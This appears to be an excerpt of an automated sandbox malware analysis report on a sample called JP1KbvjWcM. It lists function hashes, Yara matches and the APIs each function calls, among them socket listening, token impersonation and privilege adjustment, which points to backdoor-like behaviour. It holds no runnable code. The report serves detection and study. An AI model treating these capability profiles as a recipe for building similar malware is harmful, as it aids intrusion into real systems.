                  • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                  • Instruction Fuzzy Hash: 8952BFB260CEF486FB7D8A15994C36E7AA0BF417BCF1C1105DA464AADCDB7AC941CB01
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                  • String ID:
                  • API String ID: 3318157856-3916222277
                  • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                  • Instruction ID: 295dbc23cf6da91fdf6b63d54dfbb3268f4fc36c1acb08190815bedb52da247a
                  • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                  • Instruction Fuzzy Hash: 2852A132608EF487FB7D8A5D994836E6BA0BF457ACF2C1005DA465BADCD77AC940CB40
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                  • String ID: $@
                  • API String ID: 3613058218-1077428164
                  • Opcode ID: 0599035506f01076b605f9026c3628a483f4ccd483033c44f83e2593a1d2db07
                  • Instruction ID: 1d87c2098c9b706854f5dd19b263c5c17f3e0620f57319476aed66973643a5ba
                  • Opcode Fuzzy Hash: 0599035506f01076b605f9026c3628a483f4ccd483033c44f83e2593a1d2db07
                  • Instruction Fuzzy Hash: 0E622931918EED8FFB6C9A1884E93BB77D1FB55308F24011DD887CB9D9D63688428762
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                  • String ID:
                  • API String ID: 3613058218-3916222277
                  • Opcode ID: 99560b4e6a3ba651302837abcdacc877c80be0c82fbf8e81c16206e006ab6ccb
                  • Instruction ID: 8d6b9145b50729ab0893b35aa6366f4dc20bef4e07ecfd62368a12ef045f11eb
                  • Opcode Fuzzy Hash: 99560b4e6a3ba651302837abcdacc877c80be0c82fbf8e81c16206e006ab6ccb
                  • Instruction Fuzzy Hash: F0622C31918EAD8EFB6C8A18C4E93BBB7D1FF55308F24011DD587CBADAD63698028751
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snprintf$_errno_invalid_parameter_noinfo
                  • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                  • API String ID: 3442832105-1222817042
                  • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                  • Instruction ID: d3f26a745d5523a118b411569f298f4c5cd75b1cb0095743bd779b62c9f44abc
                  • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                  • Instruction Fuzzy Hash: 3642B771614ED492EB29AB2DD4453E8A3A0FFD875DF085101DF8917B69EF39D2A2C340
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                  • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                  • API String ID: 723279517-1754256099
                  • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                  • Instruction ID: 931ae54c93189cfd78a421516bb11d76ff25b1a368854a10c2beaeecfe5442eb
                  • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                  • Instruction Fuzzy Hash: 6961D072304FA096EB18EB61E84929DA3A1FB94B8CF444015EE5A43B9DDB7EC506CB00
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                  • String ID:
                  • API String ID: 3044875250-0
                  • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                  • Instruction ID: 263b62a0c9e712316d8a0a26b2c0e2ffdceb8bc5492a6917a911e80f3e5d501b
                  • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                  • Instruction Fuzzy Hash: 2B719332204F9092E728AF21EC8935D73A1FF98B9CF594129EA5943BACDF7AC455C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                  • String ID: %s\*
                  • API String ID: 2620626937-766152087
                  • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                  • Instruction ID: e9e93c717748e9c3343cd8b4b77163a91dcf2b01478aca3790c23fdf9e30dccf
                  • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                  • Instruction Fuzzy Hash: E9316F35204DE115EA1D6B626C193A97BA17F96FDCF8C8151DEA5077DACF3AC4438300
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: bindclosesockethtonsioctlsocketlistensocket
                  • String ID:
                  • API String ID: 1767165869-0
                  • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                  • Instruction ID: 8eaec8323ec306b830540f36bebb1ed5e18cadb016229a0dcedb52b945b16cba
                  • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                  • Instruction Fuzzy Hash: C121EB31304FE486EB285F16AC1925977A0FB94F6CF4C4724DE6653798CB3ED4468700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                  • String ID:
                  • API String ID: 3910169428-0
                  • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                  • Instruction ID: 8c8da1c621952b3c22a60d249396e24cd088df8b0917a601c55d321d0fc43353
                  • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                  • Instruction Fuzzy Hash: FC215135210FA096E718AF21E8197997760BB98BACF584325DE69433D8DF3DC54AC640
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID:
                  • String ID: $ $Infinity$NaN
                  • API String ID: 0-3274152445
                  • Opcode ID: 5facf488f1f244cafe667ee773a1f67a142571c84910a82704edcb4632f78b71
                  • Instruction ID: cc8527c66e1801b44a69c5e103dc7a38a9e9963267e6d4daf438cbb12a26bed7
                  • Opcode Fuzzy Hash: 5facf488f1f244cafe667ee773a1f67a142571c84910a82704edcb4632f78b71
                  • Instruction Fuzzy Hash: FFD2B572A1CA818BE7518F25E45072AB791FB89780F194135EA8AF7B6DDF3DE4418F00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                  • String ID: %s\%s
                  • API String ID: 3621627092-4073750446
                  • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                  • Instruction ID: 97b3aeee6c046c5e3a50e53c66bcb234f144d0af44c3033510b2e373fbe961b3
                  • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                  • Instruction Fuzzy Hash: 5C412E70314FA081FA08AB62EC5975E63A1FF95B8CF480129E95E4779EDF3EC5468740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountSleepTick$closesocket
                  • String ID:
                  • API String ID: 2363407838-0
                  • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                  • Instruction ID: 51095a5a31c435d0d47219e4963a5ca8ac15b55e30224d232aad0ad8861ae889
                  • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                  • Instruction Fuzzy Hash: 2321C531704FE081EA14A762BC4929A6250BBD5BBCF484725EDBE477DEDE3DC5068700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: bindclosesockethtonslistensocket
                  • String ID:
                  • API String ID: 564772725-0
                  • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                  • Instruction ID: cdb241aaaf5c1ba2ea01b17715f9fddc7c34d798ce4bdf07f05770c8279682c0
                  • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                  • Instruction Fuzzy Hash: 3111B735614FE481E628EF15EC19219B3A0FB84BACF484325EEA6077D8DF3EC1058704
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                  • String ID: %s
                  • API String ID: 4244140340-620797490
                  • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                  • Instruction ID: 7176356826f8d50eec0f920e18040da539260ca7b2009f89c1c5c5af0dbcd608
                  • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                  • Instruction Fuzzy Hash: 42217E72B00F9099FB189B61D8497EC33A5FB98B8CF484555CE4C93A49EF35C515C380
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$ErrorLastSleepioctlsocket
                  • String ID:
                  • API String ID: 1121440892-0
                  • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                  • Instruction ID: f1653cec0562a96eda720a7e21a7747f94356450874b629d054a51ec27c5d604
                  • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                  • Instruction Fuzzy Hash: A0315E36B00FA095EB14EBA2E84829C33B5FB88B98F550225DF6D93799DF35C505C340
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                  • String ID:
                  • API String ID: 1212816094-0
                  • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                  • Instruction ID: e23d472ed9bdfe9741f23c5e70d0ded375a536f3195cca1997ded654bc8ec642
                  • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                  • Instruction Fuzzy Hash: E5F0C236324ED092EB588B25AC4975AA2A0FF88B98F5C9425EA0B4375CCE3EC4458A10
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                  • String ID:
                  • API String ID: 3419463915-0
                  • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                  • Instruction ID: 97f21b70898ba868a3f88785c78cd0c1938be72f4def7c81f72263e0be61a483
                  • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                  • Instruction Fuzzy Hash: DCE18272610FA187FB289B25EC493AA63A1FB9475CF4C4125DB9B8769ADF3DE045C300
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateCheckFreeInitializeMembershipToken
                  • String ID:
                  • API String ID: 3429775523-0
                  • Opcode ID: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                  • Instruction ID: 044fa89cc85414392cde0d756fe0b178d62eb0a222b4a8d3a2093530d6272b44
                  • Opcode Fuzzy Hash: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                  • Instruction Fuzzy Hash: C0015A73624A818FE7248F20E8493AE33B0F76476EF010A09F65946A98CB7DC159CF80
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $<
                  • API String ID: 0-428540627
                  • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                  • Instruction ID: b1e7504c12a95a1bb801bdedd71bc525dbb33a943d210fcb764e297e63be3d80
                  • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                  • Instruction Fuzzy Hash: 1A92F3B2325A8087DB58CB1DE4A573AB7A1F3C8B84F44512AE79B87798CE3DC551CB04
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _initp_misc_winsig
                  • String ID:
                  • API String ID: 2710132595-0
                  • Opcode ID: c8c90554330dcabd03fa81e8dd660722591610607187a6cda5de2b4df199049a
                  • Instruction ID: 160cb55158b31eb8fa6eef1a7c97e44644c71df3a3f6f0c574793462f80950bf
                  • Opcode Fuzzy Hash: c8c90554330dcabd03fa81e8dd660722591610607187a6cda5de2b4df199049a
                  • Instruction Fuzzy Hash: DFA1EB71619A098FEF94FF75E8986AA37B2F768301721893A900AC3174DABCD545CB40
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID:
                  • String ID: .
                  • API String ID: 0-248832578
                  • Opcode ID: dc7c95912ea179b4376ebdfd1fe7d6f82869dd945337f08c514ca93ba6913bec
                  • Instruction ID: 8c592b85fa661ffe5a760a63826ff3865378b6b11585e7dada97eda442b1b74f
                  • Opcode Fuzzy Hash: dc7c95912ea179b4376ebdfd1fe7d6f82869dd945337f08c514ca93ba6913bec
                  • Instruction Fuzzy Hash: 46B1F562E1CA5642FB698E25D40577DA652BB58B84F0C8134DE0EFB7ECDE7CE9408700
                  APIs
                  Memory Dump Source
